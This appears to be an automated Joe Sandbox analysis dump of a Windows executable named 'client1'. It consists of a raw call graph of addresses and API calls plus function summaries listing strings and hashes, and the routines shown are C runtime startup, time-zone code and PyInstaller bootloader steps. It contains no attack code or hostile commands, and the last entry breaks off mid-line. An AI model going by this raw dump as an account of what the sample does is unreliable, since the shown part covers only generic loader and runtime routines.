_RTC_Initialize 19088 7ff79f62b139 19080->19088 19101 7ff79f62b568 19080->19101 19082 7ff79f62b0f9 19104 7ff79f637e6c 19082->19104 19088->19078 19089 7ff79f62b155 19088->19089 19091 7ff79f6357ad 19090->19091 19092 7ff79f6357b5 19091->19092 19093 7ff79f634444 _findclose 11 API calls 19091->19093 19092->19076 19094 7ff79f6357c4 19093->19094 19095 7ff79f639db0 _invalid_parameter_noinfo 37 API calls 19094->19095 19095->19092 19097 7ff79f62b3c9 19096->19097 19100 7ff79f62b3ce __scrt_acquire_startup_lock 19096->19100 19098 7ff79f62b69c 7 API calls 19097->19098 19097->19100 19099 7ff79f62b442 19098->19099 19100->19080 19129 7ff79f62b52c 19101->19129 19103 7ff79f62b571 19103->19082 19105 7ff79f62b105 19104->19105 19106 7ff79f637e8c 19104->19106 19105->19088 19128 7ff79f62b63c InitializeSListHead 19105->19128 19107 7ff79f637eaa GetModuleFileNameW 19106->19107 19108 7ff79f637e94 19106->19108 19112 7ff79f637ed5 19107->19112 19109 7ff79f634444 _findclose 11 API calls 19108->19109 19110 7ff79f637e99 19109->19110 19111 7ff79f639db0 _invalid_parameter_noinfo 37 API calls 19110->19111 19111->19105 19144 7ff79f637e0c 19112->19144 19115 7ff79f637f1d 19116 7ff79f634444 _findclose 11 API calls 19115->19116 19117 7ff79f637f22 19116->19117 19118 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19117->19118 19118->19105 19119 7ff79f637f57 19121 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19119->19121 19120 7ff79f637f35 19120->19119 19122 7ff79f637f9c 19120->19122 19123 7ff79f637f83 19120->19123 19121->19105 19125 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19122->19125 19124 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19123->19124 19126 7ff79f637f8c 19124->19126 19125->19119 19127 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19126->19127 19127->19105 19130 7ff79f62b546 19129->19130 19132 7ff79f62b53f 19129->19132 19133 7ff79f638eec 
19130->19133 19132->19103 19136 7ff79f638b28 19133->19136 19143 7ff79f63f788 EnterCriticalSection 19136->19143 19145 7ff79f637e5c 19144->19145 19146 7ff79f637e24 19144->19146 19145->19115 19145->19120 19146->19145 19147 7ff79f63dd40 _findclose 11 API calls 19146->19147 19148 7ff79f637e52 19147->19148 19149 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19148->19149 19149->19145 14868 7ff79f62b19c 14889 7ff79f62b36c 14868->14889 14871 7ff79f62b2e8 14991 7ff79f62b69c IsProcessorFeaturePresent 14871->14991 14872 7ff79f62b1b8 __scrt_acquire_startup_lock 14874 7ff79f62b2f2 14872->14874 14881 7ff79f62b1d6 __scrt_release_startup_lock 14872->14881 14875 7ff79f62b69c 7 API calls 14874->14875 14877 7ff79f62b2fd _CreateFrameInfo 14875->14877 14876 7ff79f62b1fb 14878 7ff79f62b281 14895 7ff79f62b7e8 14878->14895 14880 7ff79f62b286 14898 7ff79f621000 14880->14898 14881->14876 14881->14878 14980 7ff79f638984 14881->14980 14886 7ff79f62b2a9 14886->14877 14987 7ff79f62b500 14886->14987 14998 7ff79f62b96c 14889->14998 14892 7ff79f62b1b0 14892->14871 14892->14872 14893 7ff79f62b39b __scrt_initialize_crt 14893->14892 15000 7ff79f62cac8 14893->15000 15027 7ff79f62c210 14895->15027 14897 7ff79f62b7ff GetStartupInfoW 14897->14880 14899 7ff79f62100b 14898->14899 15029 7ff79f627600 14899->15029 14901 7ff79f62101d 15036 7ff79f634f14 14901->15036 14903 7ff79f62367b 15043 7ff79f621af0 14903->15043 14907 7ff79f62ad80 _wfindfirst32i64 8 API calls 14908 7ff79f6237ae 14907->14908 14985 7ff79f62b82c GetModuleHandleW 14908->14985 14909 7ff79f623699 14972 7ff79f62379a 14909->14972 15059 7ff79f623b20 14909->15059 14911 7ff79f6236cb 14911->14972 15062 7ff79f626990 14911->15062 14913 7ff79f6236e7 14914 7ff79f623733 14913->14914 14915 7ff79f626990 61 API calls 14913->14915 15077 7ff79f626f90 14914->15077 14921 7ff79f623708 __std_exception_destroy 14915->14921 14917 7ff79f623748 15081 7ff79f6219d0 14917->15081 14920 7ff79f62383d 14923 7ff79f623868 14920->14923 15186 
7ff79f623280 14920->15186 14921->14914 14926 7ff79f626f90 58 API calls 14921->14926 14922 7ff79f6219d0 121 API calls 14925 7ff79f62377e 14922->14925 14934 7ff79f6238ab 14923->14934 15092 7ff79f627a30 14923->15092 14929 7ff79f6237c0 14925->14929 14930 7ff79f623782 14925->14930 14926->14914 14928 7ff79f623888 14931 7ff79f62389e SetDllDirectoryW 14928->14931 14932 7ff79f62388d 14928->14932 14929->14920 15163 7ff79f623cb0 14929->15163 15150 7ff79f622770 14930->15150 14931->14934 14935 7ff79f622770 59 API calls 14932->14935 15106 7ff79f625e40 14934->15106 14935->14972 14940 7ff79f6237e2 14945 7ff79f622770 59 API calls 14940->14945 14941 7ff79f623906 14948 7ff79f6239c6 14941->14948 14956 7ff79f623919 14941->14956 14944 7ff79f623810 14944->14920 14947 7ff79f623815 14944->14947 14945->14972 14946 7ff79f6238c8 14946->14941 15200 7ff79f625640 14946->15200 15182 7ff79f62f2ac 14947->15182 15110 7ff79f623110 14948->15110 14954 7ff79f6238fc 15294 7ff79f625890 14954->15294 14955 7ff79f6238dd 15220 7ff79f6255d0 14955->15220 14961 7ff79f623965 14956->14961 15300 7ff79f621b30 14956->15300 14961->14972 15304 7ff79f6230b0 14961->15304 14962 7ff79f6238e7 14962->14954 14964 7ff79f6238eb 14962->14964 14963 7ff79f6239fb 14965 7ff79f626990 61 API calls 14963->14965 15288 7ff79f625c90 14964->15288 14970 7ff79f623a07 14965->14970 14968 7ff79f6239a1 14971 7ff79f625890 FreeLibrary 14968->14971 14970->14972 15127 7ff79f626fd0 14970->15127 14971->14972 14972->14907 14981 7ff79f6389bc 14980->14981 14982 7ff79f63899b 14980->14982 17688 7ff79f6390d8 14981->17688 14982->14878 14986 7ff79f62b83d 14985->14986 14986->14886 14989 7ff79f62b511 14987->14989 14988 7ff79f62b2c0 14988->14876 14989->14988 14990 7ff79f62cac8 __scrt_initialize_crt 7 API calls 14989->14990 14990->14988 14992 7ff79f62b6c2 _wfindfirst32i64 memcpy_s 14991->14992 14993 7ff79f62b6e1 RtlCaptureContext RtlLookupFunctionEntry 14992->14993 14994 7ff79f62b70a RtlVirtualUnwind 14993->14994 14995 7ff79f62b746 memcpy_s 14993->14995 
14994->14995 14996 7ff79f62b778 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14995->14996 14997 7ff79f62b7ca _wfindfirst32i64 14996->14997 14997->14874 14999 7ff79f62b38e __scrt_dllmain_crt_thread_attach 14998->14999 14999->14892 14999->14893 15001 7ff79f62cada 15000->15001 15002 7ff79f62cad0 15000->15002 15001->14892 15006 7ff79f62ce44 15002->15006 15007 7ff79f62ce53 15006->15007 15009 7ff79f62cad5 15006->15009 15014 7ff79f62d080 15007->15014 15010 7ff79f62ceb0 15009->15010 15011 7ff79f62cedb 15010->15011 15012 7ff79f62cebe DeleteCriticalSection 15011->15012 15013 7ff79f62cedf 15011->15013 15012->15011 15013->15001 15018 7ff79f62cee8 15014->15018 15019 7ff79f62d002 TlsFree 15018->15019 15025 7ff79f62cf2c __vcrt_InitializeCriticalSectionEx 15018->15025 15020 7ff79f62cf5a LoadLibraryExW 15022 7ff79f62cf7b GetLastError 15020->15022 15023 7ff79f62cfd1 15020->15023 15021 7ff79f62cff1 GetProcAddress 15021->15019 15022->15025 15023->15021 15024 7ff79f62cfe8 FreeLibrary 15023->15024 15024->15021 15025->15019 15025->15020 15025->15021 15026 7ff79f62cf9d LoadLibraryExW 15025->15026 15026->15023 15026->15025 15028 7ff79f62c1f0 15027->15028 15028->14897 15028->15028 15030 7ff79f62761f 15029->15030 15031 7ff79f627627 __std_exception_destroy 15030->15031 15032 7ff79f627670 WideCharToMultiByte 15030->15032 15034 7ff79f627718 15030->15034 15035 7ff79f6276c6 WideCharToMultiByte 15030->15035 15031->14901 15032->15030 15032->15034 15359 7ff79f622620 15034->15359 15035->15030 15035->15034 15038 7ff79f63ec40 15036->15038 15037 7ff79f63ec93 15039 7ff79f639ce4 _invalid_parameter_noinfo 37 API calls 15037->15039 15038->15037 15040 7ff79f63ece6 15038->15040 15041 7ff79f63ecbc 15039->15041 15756 7ff79f63eb18 15040->15756 15041->14903 15044 7ff79f621b05 15043->15044 15045 7ff79f621b20 15044->15045 15764 7ff79f6224d0 15044->15764 15045->14972 15047 7ff79f623ba0 15045->15047 15048 7ff79f62adb0 15047->15048 15049 7ff79f623bac GetModuleFileNameW 15048->15049 15050 
16829->16824 16829->16825 16830 7ff79f63dea4 LoadLibraryExW 16829->16830 16830->16826 16830->16829 16833 7ff79f63e7f9 MultiByteToWideChar 16831->16833 16861 7ff79f63918d 16860->16861 16862 7ff79f62707a 16860->16862 16863 7ff79f634444 _findclose 11 API calls 16861->16863 16866 7ff79f636ef8 16862->16866 16864 7ff79f639192 16863->16864 16867 7ff79f636f01 16866->16867 16868 7ff79f636f16 16866->16868 16879 7ff79f6353fc 16878->16879 16880 7ff79f635422 16879->16880 16883 7ff79f635455 16879->16883 16881 7ff79f634444 _findclose 11 API calls 16880->16881 16882 7ff79f635427 16881->16882 16884 7ff79f639db0 _invalid_parameter_noinfo 37 API calls 16882->16884 16885 7ff79f635468 16883->16885 16886 7ff79f63545b 16883->16886 16887 7ff79f623d09 16884->16887 16897 7ff79f63a0f8 16885->16897 16888 7ff79f634444 _findclose 11 API calls 16886->16888 16887->15171 16888->16887 16910 7ff79f63f788 EnterCriticalSection 16897->16910 17258 7ff79f637968 17257->17258 17261 7ff79f637444 17258->17261 17260 7ff79f637981 17260->15181 17262 7ff79f63748e 17261->17262 17263 7ff79f63745f 17261->17263 17271 7ff79f6342ec EnterCriticalSection 17262->17271 17264 7ff79f639ce4 _invalid_parameter_noinfo 37 API calls 17263->17264 17266 7ff79f63747f 17264->17266 17266->17260 17273 7ff79f62f0d1 17272->17273 17274 7ff79f62f0a3 17272->17274 17278 7ff79f62f0c3 17273->17278 17282 7ff79f6342ec EnterCriticalSection 17273->17282 17275 7ff79f639ce4 _invalid_parameter_noinfo 37 API calls 17274->17275 17275->17278 17278->15185 17284 7ff79f6212f8 17283->17284 17285 7ff79f6212c6 17283->17285 17287 7ff79f62f934 73 API calls 17284->17287 17286 7ff79f623cb0 116 API calls 17285->17286 17289 7ff79f6212d6 17286->17289 17288 7ff79f62130a 17287->17288 17290 7ff79f62130e 17288->17290 17291 7ff79f62132f 17288->17291 17289->17284 17292 7ff79f6212de 17289->17292 17293 7ff79f6224d0 59 API calls 17290->17293 17297 7ff79f621364 17291->17297 17298 7ff79f621344 17291->17298 17294 7ff79f622770 59 API calls 17292->17294 17295 7ff79f621325 
17293->17295 17296 7ff79f6212ee 17294->17296 17295->15195 17296->15195 17300 7ff79f62137e 17297->17300 17304 7ff79f621395 17297->17304 17299 7ff79f6224d0 59 API calls 17298->17299 17306 7ff79f62135f __std_exception_destroy 17299->17306 17301 7ff79f621050 98 API calls 17300->17301 17301->17306 17302 7ff79f62f5fc _fread_nolock 53 API calls 17302->17304 17303 7ff79f621421 17303->15195 17304->17302 17304->17306 17307 7ff79f6213de 17304->17307 17305 7ff79f62f2ac 74 API calls 17305->17303 17306->17303 17306->17305 17308 7ff79f6224d0 59 API calls 17307->17308 17308->17306 17310 7ff79f621b30 49 API calls 17309->17310 17311 7ff79f623d60 17310->17311 17311->15197 17313 7ff79f6216aa 17312->17313 17314 7ff79f621666 17312->17314 17313->15214 17314->17313 17315 7ff79f622770 59 API calls 17314->17315 17316 7ff79f6216be 17315->17316 17316->15214 17318 7ff79f627a30 57 API calls 17317->17318 17319 7ff79f6271c7 LoadLibraryExW 17318->17319 17320 7ff79f6271e4 __std_exception_destroy 17319->17320 17320->15222 17321->15297 17322->15296 17324 7ff79f624970 17323->17324 17325 7ff79f621b30 49 API calls 17324->17325 17326 7ff79f6249a2 17325->17326 17327 7ff79f6249cb 17326->17327 17328 7ff79f6249ab 17326->17328 17330 7ff79f624a22 17327->17330 17332 7ff79f623d30 49 API calls 17327->17332 17329 7ff79f622770 59 API calls 17328->17329 17333 7ff79f6249c1 17329->17333 17331 7ff79f623d30 49 API calls 17330->17331 17338 7ff79f624a3b 17331->17338 17334 7ff79f6249ec 17332->17334 17336 7ff79f62ad80 _wfindfirst32i64 8 API calls 17333->17336 17335 7ff79f624a0a 17334->17335 17339 7ff79f622770 59 API calls 17334->17339 17408 7ff79f623c40 17335->17408 17341 7ff79f6230be 17336->17341 17337 7ff79f624a59 17343 7ff79f6271b0 58 API calls 17337->17343 17338->17337 17342 7ff79f622770 59 API calls 17338->17342 17339->17335 17341->15307 17351 7ff79f624ce0 17341->17351 17342->17337 17345 7ff79f624a66 17343->17345 17346 7ff79f624a6b 17345->17346 17347 7ff79f624a8d 17345->17347 17348 7ff79f622620 57 API calls 
17346->17348 17414 7ff79f623df0 GetProcAddress 17347->17414 17348->17333 17350 7ff79f6271b0 58 API calls 17350->17330 17352 7ff79f626990 61 API calls 17351->17352 17354 7ff79f624cf5 17352->17354 17353 7ff79f624d10 17355 7ff79f627a30 57 API calls 17353->17355 17354->17353 17356 7ff79f622880 59 API calls 17354->17356 17357 7ff79f624d54 17355->17357 17356->17353 17358 7ff79f624d59 17357->17358 17359 7ff79f624d70 17357->17359 17360 7ff79f622770 59 API calls 17358->17360 17362 7ff79f627a30 57 API calls 17359->17362 17361 7ff79f624d65 17360->17361 17361->15309 17363 7ff79f624da5 17362->17363 17365 7ff79f621b30 49 API calls 17363->17365 17377 7ff79f624daa __std_exception_destroy 17363->17377 17364 7ff79f622770 59 API calls 17366 7ff79f624f51 17364->17366 17367 7ff79f624e27 17365->17367 17366->15309 17368 7ff79f624e2e 17367->17368 17369 7ff79f624e53 17367->17369 17370 7ff79f622770 59 API calls 17368->17370 17371 7ff79f627a30 57 API calls 17369->17371 17377->17364 17378 7ff79f624f3a 17377->17378 17378->15309 17380 7ff79f6246f7 17379->17380 17380->17380 17381 7ff79f624720 17380->17381 17388 7ff79f624737 __std_exception_destroy 17380->17388 17409 7ff79f623c4a 17408->17409 17410 7ff79f627a30 57 API calls 17409->17410 17411 7ff79f623c72 17410->17411 17412 7ff79f62ad80 _wfindfirst32i64 8 API calls 17411->17412 17413 7ff79f623c9a 17412->17413 17413->17330 17413->17350 17415 7ff79f623e18 17414->17415 17416 7ff79f623e3b GetProcAddress 17414->17416 17418 7ff79f622620 57 API calls 17415->17418 17416->17415 17417 7ff79f623e60 GetProcAddress 17416->17417 17417->17415 17419 7ff79f623e85 GetProcAddress 17417->17419 17420 7ff79f623e2b 17418->17420 17419->17415 17421 7ff79f623ead GetProcAddress 17419->17421 17420->17333 17421->17415 17422 7ff79f623ed5 GetProcAddress 17421->17422 17422->17415 17423 7ff79f623efd GetProcAddress 17422->17423 17424 7ff79f623f19 17423->17424 17425 7ff79f623f25 GetProcAddress 17423->17425 17424->17425 17426 7ff79f623f4d GetProcAddress 17425->17426 17427 
7ff79f623f41 17425->17427 17428 7ff79f623f69 17426->17428 17427->17426 17429 7ff79f623f7d GetProcAddress 17428->17429 17430 7ff79f623fa5 GetProcAddress 17428->17430 17429->17430 17689 7ff79f63a620 _CreateFrameInfo 45 API calls 17688->17689 17690 7ff79f6390e1 17689->17690 17691 7ff79f63920c _CreateFrameInfo 45 API calls 17690->17691 17692 7ff79f639101 17691->17692 19249 7ff79f63a4a0 19250 7ff79f63a4a5 19249->19250 19254 7ff79f63a4ba 19249->19254 19255 7ff79f63a4c0 19250->19255 19256 7ff79f63a50a 19255->19256 19257 7ff79f63a502 19255->19257 19259 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19256->19259 19258 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19257->19258 19258->19256 19260 7ff79f63a517 19259->19260 19261 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19260->19261 19262 7ff79f63a524 19261->19262 19263 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19262->19263 19264 7ff79f63a531 19263->19264 19265 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19264->19265 19266 7ff79f63a53e 19265->19266 19267 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19266->19267 19268 7ff79f63a54b 19267->19268 19269 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19268->19269 19270 7ff79f63a558 19269->19270 19271 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19270->19271 19272 7ff79f63a565 19271->19272 19273 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19272->19273 19274 7ff79f63a575 19273->19274 19275 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19274->19275 19276 7ff79f63a585 19275->19276 19281 7ff79f63a364 19276->19281 19295 7ff79f63f788 EnterCriticalSection 19281->19295 17698 7ff79f62a620 17699 7ff79f62a643 17698->17699 17700 7ff79f62a65f memcpy_s 17698->17700 17701 7ff79f63cacc 12 API calls 
17699->17701 17701->17700

                                                    Control-flow Graph

                                                    APIs
                                                    • _get_daylight.LIBCMT ref: 00007FF79F644E65
                                                      • Part of subcall function 00007FF79F6447B8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79F6447CC
                                                      • Part of subcall function 00007FF79F639E18: RtlFreeHeap.NTDLL(?,?,?,00007FF79F641E42,?,?,?,00007FF79F641E7F,?,?,00000000,00007FF79F642345,?,?,?,00007FF79F642277), ref: 00007FF79F639E2E
                                                      • Part of subcall function 00007FF79F639E18: GetLastError.KERNEL32(?,?,?,00007FF79F641E42,?,?,?,00007FF79F641E7F,?,?,00000000,00007FF79F642345,?,?,?,00007FF79F642277), ref: 00007FF79F639E38
                                                      • Part of subcall function 00007FF79F639DD0: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF79F639DAF,?,?,?,?,?,00007FF79F6321EC), ref: 00007FF79F639DD9
                                                      • Part of subcall function 00007FF79F639DD0: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF79F639DAF,?,?,?,?,?,00007FF79F6321EC), ref: 00007FF79F639DFE
                                                    • _get_daylight.LIBCMT ref: 00007FF79F644E54
                                                      • Part of subcall function 00007FF79F644818: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79F64482C
                                                    • _get_daylight.LIBCMT ref: 00007FF79F6450CA
                                                    • _get_daylight.LIBCMT ref: 00007FF79F6450DB
                                                    • _get_daylight.LIBCMT ref: 00007FF79F6450EC
                                                    • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF79F64532C), ref: 00007FF79F645113
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                    • String ID: Eastern Standard Time$Eastern Summer Time
                                                    • API String ID: 4070488512-239921721
                                                    • Opcode ID: 77ba2d10f7a40a17f98ee8fd01e8c058cff67636c36494bf754a44884999314e
                                                    • Instruction ID: fcc2753484b5f486a54e18bddd1f7662d5bede607d47f748dcb017644e45245b
                                                    • Opcode Fuzzy Hash: 77ba2d10f7a40a17f98ee8fd01e8c058cff67636c36494bf754a44884999314e
                                                    • Instruction Fuzzy Hash: FAD1AE26A0878286E730BF35D9411F9A2AAFF85B94FD04136EE2D476C5DF3CE8418760

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                    • String ID:
                                                    • API String ID: 1617910340-0
                                                    • Opcode ID: f9714f3a8e10acd42ca2d2c5b2c2c8a966f4ca54d5d677232d284773bb45134f
                                                    • Instruction ID: 0ea52da5d498d6fa947fcb687aec398ebf56143a13dc56fbb48df1efb45d6f64
                                                    • Opcode Fuzzy Hash: f9714f3a8e10acd42ca2d2c5b2c2c8a966f4ca54d5d677232d284773bb45134f
                                                    • Instruction Fuzzy Hash: B3C1A032B24B8286EB20FF75C4906ECB76AEB49B98B810235DA2E577D5CF39D451C710

                                                    Control-flow Graph

                                                    APIs
                                                    • GetTempPathW.KERNEL32(?,00000000,?,00007FF79F62674D), ref: 00007FF79F62681A
                                                      • Part of subcall function 00007FF79F626990: GetEnvironmentVariableW.KERNEL32(00007FF79F6236E7), ref: 00007FF79F6269CA
                                                      • Part of subcall function 00007FF79F626990: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF79F6269E7
                                                      • Part of subcall function 00007FF79F6366B4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79F6366CD
                                                    • SetEnvironmentVariableW.KERNEL32(?,TokenIntegrityLevel), ref: 00007FF79F6268D1
                                                      • Part of subcall function 00007FF79F622770: MessageBoxW.USER32 ref: 00007FF79F622841
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                    • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                    • API String ID: 3752271684-1116378104
                                                    • Opcode ID: f94b85ae83cde5ff99a73dacb969786b4b90177c333bd4c8ae2eb3a11c31c338
                                                    • Instruction ID: b73e192bfc0180aee66994aca1c09f11a953c254c91d60ba9fbfde6821ca2ccd
                                                    • Opcode Fuzzy Hash: f94b85ae83cde5ff99a73dacb969786b4b90177c333bd4c8ae2eb3a11c31c338
                                                    • Instruction Fuzzy Hash: A1517811F197C340FA74BB7299552FAD25B9F4ABC4FC44031E82E87796EE6EE4018721

                                                    Control-flow Graph

                                                    APIs
                                                    • _get_daylight.LIBCMT ref: 00007FF79F6450CA
                                                      • Part of subcall function 00007FF79F644818: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79F64482C
                                                    • _get_daylight.LIBCMT ref: 00007FF79F6450DB
                                                      • Part of subcall function 00007FF79F6447B8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79F6447CC
                                                    • _get_daylight.LIBCMT ref: 00007FF79F6450EC
                                                      • Part of subcall function 00007FF79F6447E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79F6447FC
                                                      • Part of subcall function 00007FF79F639E18: RtlFreeHeap.NTDLL(?,?,?,00007FF79F641E42,?,?,?,00007FF79F641E7F,?,?,00000000,00007FF79F642345,?,?,?,00007FF79F642277), ref: 00007FF79F639E2E
                                                      • Part of subcall function 00007FF79F639E18: GetLastError.KERNEL32(?,?,?,00007FF79F641E42,?,?,?,00007FF79F641E7F,?,?,00000000,00007FF79F642345,?,?,?,00007FF79F642277), ref: 00007FF79F639E38
                                                    • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF79F64532C), ref: 00007FF79F645113
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                    • String ID: Eastern Standard Time$Eastern Summer Time
                                                    • API String ID: 3458911817-239921721
                                                    • Opcode ID: 74e2aae664cff904285b8cceaf5bd78e264b53cf78d1017760ee0a7f729cca6e
                                                    • Instruction ID: a796102b552945bb7b714767cf37b22a4ce92422f55e44ceb41ad888243889cb
                                                    • Opcode Fuzzy Hash: 74e2aae664cff904285b8cceaf5bd78e264b53cf78d1017760ee0a7f729cca6e
                                                    • Instruction Fuzzy Hash: A5515E32A187C286E730FF35E9815E9E76ABB49784FC44136EA6D43695DF3CE4018B60

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _fread_nolock$Message_invalid_parameter_noinfo
                                                    • String ID: Cannot read Table of Contents.$Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                    • API String ID: 2153230061-4158440160
                                                    • Opcode ID: 913ca2d16dd3917f3c6faf0798bc0d1b393c399123eb092558c7b1ba1e71a965
                                                    • Instruction ID: 9aac773805030bf4195233d69171114b75a8bd81207c8e60e0cba850760d5a67
                                                    • Opcode Fuzzy Hash: 913ca2d16dd3917f3c6faf0798bc0d1b393c399123eb092558c7b1ba1e71a965
                                                    • Instruction Fuzzy Hash: DF516F72A1978286EF24EF38D8901F8A3AAEB48B58B914135D92CC7395DF3CE540C751

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID:
